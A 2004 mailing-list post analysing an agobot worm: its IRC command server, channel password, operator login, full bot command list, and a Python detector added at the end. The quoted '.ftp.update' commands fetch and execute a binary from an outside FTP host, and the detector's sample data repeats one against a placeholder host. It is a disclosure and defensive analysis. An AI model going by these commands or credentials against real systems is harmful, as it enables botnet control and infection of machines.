Message-ID: <20040424224716.E7B7143E32@ws1-9.us4.outblaze.com>
From: isec at europe.com (Willem Koenings)
Subject: Re: Outbreak of a virus on campus
----- Original Message -----
From: "Morning Wood"
Date: Sat, 24 Apr 2004 18:37:31 +0000
To: mueller@...net.com, full-disclosure@...ts.netsys.com
Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
> phatbot?
This one is yet another agobot. It has a long list of useful commands
(included at the end of the posting, if someone is interested...),
polymorph capability, stealth capability - hides its own process
in memory and its binary from listing, is capable of updating itself
via ftp/http, has a list of servers for evaluating connection speed,
steals cdkeys, sniffs the wire, performs ddos, is capable of installing
a proxy, sends spam via aol, can install identd, has a LONG list of
various processes to kill (mostly AV, but also regedit and tcpview
among others), retrieves sysinfo, makes screenshots etc etc etc -
looks similar to other good household bots :)
What makes it interesting - its stealth capability and propagation.
It has the following scanning/propagation subroutines:
CScannerBagle
CScannerBase
CScannerDCOM
CScannerDoom
CScannerDW
CScannerHTTP
CScannerNetBios
CScannerOptix
CScannerSQL
CScannerUPNP
CScannerWKS
When the worm is started, it connects to the irc server
193.87.20.31 (irc.weednet.net) on port 7000.
Then it joins the password protected channel
#1337; the password is heyho. As the channel topic is
.scan.startall, it accepts the command and starts
scanning right away.
I took my trusty irc client and joined that
channel myself. Right away the admin gave me these
commands:
<admin> .login stebo jamesbond007 -s
<admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe %TEMP%\xgf.exeBLAOR12
<admin> .scan.stop
<admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe c:\xgf.exe BLAOR12
seems like my 'bot' version was too old :)
have fun :)
W.
-----------------------
commands and parameters
all commands start with . (dot)
irc.screencap
takes a screenshot of the active desktop
irc.server
changes the server the bot connects to
irc.reconnect
reconnects to the server
irc.raw
sends a raw message to the irc server
irc.quit
quits the bot
irc.privmsg
sends a privmsg
irc.part
makes the bot part a channel
irc.netinfo
prints netinfo
irc.mode
lets the bot perform a mode change
irc.join
makes the bot join a channel
irc.gethost.join
makes the <host> bot joins channel you want
irc.getedu.join
makes the .edu bots join channel you want
irc.gethost
prints netinfo when host matches
irc.getedu
prints netinfo when the bot is .edu
irc.dccsend
sends a file over dcc
irc.action
lets the bot perform an action
irc.disconnect
disconnects the bot from irc
bot.command
runs a command with system()
bot.unsecure
enable shares / enable dcom
bot.secure
delete shares / disable dcom
bot.flushdns
flushes the bots dns cache
bot.quit
bot.highspeed
If speed > 5000 then bot will respond
bot.longuptime
If uptime > 7 days then bot will respond
bot.sysinfo
displays the system info
bot.status
gives status
bot.rndnick
makes the bot generate a new random nick
bot.removeallbut
removes the bot if id does not match
bot.remove
removes the bot
bot.open
opens a file (whatever)
bot.nick
changes the nickname of the bot
bot.id
displays the id of the current code
bot.execute
makes the bot execute a .exe
bot.dns
resolves ip/hostname by dns
bot.die
terminates the bot
bot.about
displays the info the author wants you to see
shell.disable
Disable shell handler
shell.enable
Enable shell handler
shell.handler
FallBack handler for shell
commands.list
Lists all available commands
plugin.unload
unloads a plugin (not supported yet)
plugin.load
loads a plugin
cvar.saveconfig
saves config to a file
cvar.loadconfig
loads config from a file
cvar.set
sets the content of a cvar
cvar.get
gets the content of a cvar
cvar.list
prints a list of all cvars
inst.svcdel
deletes a service from scm
inst.svcadd
adds a service to scm
inst.asdel
deletes an autostart entry
inst.asadd
adds an autostart entry
logic.ifram
exec command if RAM Total is bigger than specified (RAM)
logic.ifdiskfree
exec command if free disk space available is bigger than specified (GB)
logic.ifcpu
exec command if proccesors CPU speed is bigger than specified (MHz)
logic.ifedu
exec command if bot is an edu
logic.ifspeed
exec command if speed(via speedtest) is bigger than specified
logic.ifuptime
exec command if uptime is bigger than specified
login
logs the user in
mac.logout
logs the user out
delay.minutes
delays a command a set amount of minutes
ftp.update
executes a file from a ftp url
ftp.execute
updates the bot from a ftp url
ftp.download
downloads a file from ftp
http.command
reads command(s) from a specified url
http.visit
visits an url
http.update
executes a file from a http url
http.execute
updates the bot from a http url
http.download
downloads a file from http
HttpCommand.Net
HttpCommand
file.find
finds a file (not added yet)
file.list
lists contents of a directory
file.rmdir
deletes a directory
file.mkdir
creates a directory
file.move
moves a file
file.delete
deleted a file
rsl.logoff
logs the user off
rsl.shutdown
shuts the computer down
rsl.reboot
reboots the computer
pctrl.killpid
kills a pid
pctrl.killsvc
deletes/stops service
pctrl.listsvc
lists all services
pctrl.kill
kills a process
pctrl.list
lists all processes
http.speedtest
Speed Test to see how fast the bot.
scan.stats
displays stats of the scanner
scan.stop
signal stop to child threads
scan.start
signal start to child threads
scan.stopall
disable all Scanners and stop scanning
scan.startall
enable all Scanners and start scanning
scan.disable
disables a scanner module
scan.enable
enables a scanner module
scan.resetnetranges
resets netranges to the localhost
scan.clearnetranges
clears all netranges registered with the scanner
scan.listnetranges
lists all netranges registered with the scanner
scan.delnetrange
deletes a netrange from the scanner
scan.addnetrange
adds a netrange to the scanner
ddos.stop
stops all floods
redirect.stop
stops all redirects running
redirect.socks
starts a socks4 proxy
harvest.cdkeys
makes the bot get a list of cdkeys
bot.repeat
inst_polymorph
Installer - Polymorph on install ?
vuln_channel
Vuln Daemon Sniffer Channel
sniffer_channel
Sniffer - Output channel
sniffer_enabled
Sniffer - Enabled ?
spam_aol_enabled
AOL Spam - Enabled ?
spam_aol_channel
AOL Spam - Channel name
scaninfo_level
Info Level 1(less) - (3)more
scaninfo_chan
Scanner - Output channel
cdkey_windows
Return Windows Product Keys on cdkey.get
identd_enabled
IdentD - Enable the server
redir_maxthreads
Redirect - Maximum Number of threads
ddos_maxthreads
DDOS - Maximum Number of threads
scan_maxsockets
Scanner - Maximum Number of sockets
scan_maxthreads
Scanner - Maximum Number of threads
as_service_name
Autostart - Short service name
as_service
Autostart - Start as service
as_enabled
Autostart - Enabled
as_valname
Autostart - Value Name
do_stealth
Bot - Enable Stealth
do_avkill
Bot - Enable AV kill
do_speedtest
Bot - Do speedtest on startup
bot_topiccmd
Bot - Execute topic commands
bot_mutex_name
Bot - Mutex name
bot_mutex
Bot - Create mutex
bot_meltserver
Bot - Melt the original server file
bot_randnick
Bot - Random nicks of Letters and Numbers
bot_compnick
Bot - Use the computer name as a nickname
bot_seclogin
Bot - Enable login only by channel messages
bot_timeout
Bot - Timeout for receiving in miliseconds
bot_prefix
Bot - Command Prefix
bot_id
Bot - Current ID
bot_filename
Bot - Runtime Filename
bot_version
0.3.0
Bot - Version
si_nick
Server Info - Nickname
si_usessl
Server Info - Use SSL ?
si_servpass
Server Info - Server Password
si_server
Server Info - Server Address
si_port
Server Info - Server Port
si_nickprefix
Server Info - Nickname prefix
si_mainchan
Server Info - Main Channel
si_chanpass
Server Info - Channel Password
bot_ftrans_port_ftp
Bot - File Transfer Port for FTP
bot_ftrans_port
Bot - File Transfer Port
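The post above describes how this agobot variant takes its orders: it joins #1337, reads the channel topic (.scan.startall) as a command, and then receives further dot-prefixed commands such as .login, .ftp.update and .scan.stop as channel messages. The following is an added detection example, not code from the post or from the bot; it scans captured IRC lines for commands whose namespace appears in the command listing above. The IRC lines are constructed sample input (the ftp host, nicks and credentials in them are placeholders, not the ones from the post), and the namespace set is derived from the listing, so a command namespace the listing does not contain will not be flagged.

```python
"""Detect agobot-style IRC command traffic in captured IRC protocol lines.

Added example (not from the post or the bot). Command namespaces come from
the command listing in the post; sample lines below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Namespaces of the dotted commands in the post's listing (.scan.startall, .ftp.update, ...).
AGOBOT_NAMESPACES = frozenset({
    "irc", "bot", "shell", "commands", "plugin", "cvar", "inst", "logic", "mac",
    "delay", "ftp", "http", "file", "rsl", "pctrl", "scan", "ddos", "redirect", "harvest",
})
# Commands listed without a namespace.
BARE_COMMANDS = frozenset({"login"})

# Minimal RFC 1459 line shape: [":prefix "] <verb or 3-digit numeric> <params>
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Za-z]+|\d{3})\s+(?P<params>.*)$")
# Bot command: dot prefix (bot_prefix in the listing), dotted name, optional arguments.
BOT_CMD = re.compile(r"^\.(?P<name>[A-Za-z_]+(?:\.[A-Za-z_]+)*)(?:\s+(?P<args>.*))?$")
URL_RE = re.compile(r"\b(?:ftp|https?)://\S+")


@dataclass
class Alert:
    via: str            # IRC verb that carried the command: "332" (topic on join), "TOPIC", "PRIVMSG"
    channel: str
    sender: str         # nick of the sender, or the server name for numerics
    command: str        # e.g. "scan.startall"
    args: str
    urls: List[str] = field(default_factory=list)   # update/download URLs worth blocking


def split_params(params: str) -> Tuple[List[str], str]:
    """Split IRC params into the middle params and the ':'-prefixed trailing text."""
    if params.startswith(":"):
        return [], params[1:]
    head, sep, trailing = params.partition(" :")
    return head.split(), trailing if sep else ""


def classify(text: str) -> Optional[Tuple[str, str]]:
    """Return (command, args) if text is a known agobot command, else None."""
    m = BOT_CMD.match(text.strip())
    if not m:
        return None
    name = m.group("name")
    if name.split(".")[0] in AGOBOT_NAMESPACES or name in BARE_COMMANDS:
        return name, (m.group("args") or "").strip()
    return None


def scan_irc_lines(lines) -> List[Alert]:
    """Flag bot commands delivered via channel topic (RPL_TOPIC 332 / TOPIC) or messages."""
    alerts: List[Alert] = []
    for raw in lines:
        m = IRC_LINE.match(raw.strip())
        if not m:
            continue
        verb = m.group("cmd").upper()
        middle, trailing = split_params(m.group("params"))
        sender = (m.group("prefix") or "").split("!")[0]
        if verb == "332" and len(middle) >= 2:          # 332 <nick> <channel> :<topic>
            channel, text = middle[1], trailing
        elif verb in ("TOPIC", "PRIVMSG", "NOTICE") and middle:
            channel, text = middle[0], trailing
        else:
            continue
        hit = classify(text)
        if hit:
            cmd, args = hit
            alerts.append(Alert(verb, channel, sender, cmd, args, URL_RE.findall(args)))
    return alerts


# Constructed sample capture: the topic delivered on join, then operator commands.
SAMPLE_LINES = [
    ":irc.example.invalid 332 xgf4821 #1337 :.scan.startall",
    ":admin!a@host.invalid PRIVMSG #1337 :.login stebo jamesbond007 -s",
    r":admin!a@host.invalid PRIVMSG #1337 :.ftp.update ftp://ftp:pass@ftp.example.invalid/incoming/dt.exe %TEMP%\xgf.exe BLAOR12",
    ":admin!a@host.invalid PRIVMSG #1337 :.scan.stop",
    ":bob!b@host.invalid PRIVMSG #chat :.join is just a word here",   # unknown namespace, not flagged
    ":bob!b@host.invalid PRIVMSG #chat :ping",
]


if __name__ == "__main__":
    for a in scan_irc_lines(SAMPLE_LINES):
        print(f"{a.via:7} {a.channel} {a.sender or '-':8} .{a.command} {a.args} urls={a.urls}")
```

Two design points: the topic is checked on the 332 numeric, because that is how a freshly joined client (and the bot, with bot_topiccmd enabled) actually receives it, so a command that arrived before the capture started still shows up; and URLs are pulled out of .ftp.update/.http.update arguments separately, since those are the values a responder most wants for egress blocking and for pulling the dropped binary for analysis.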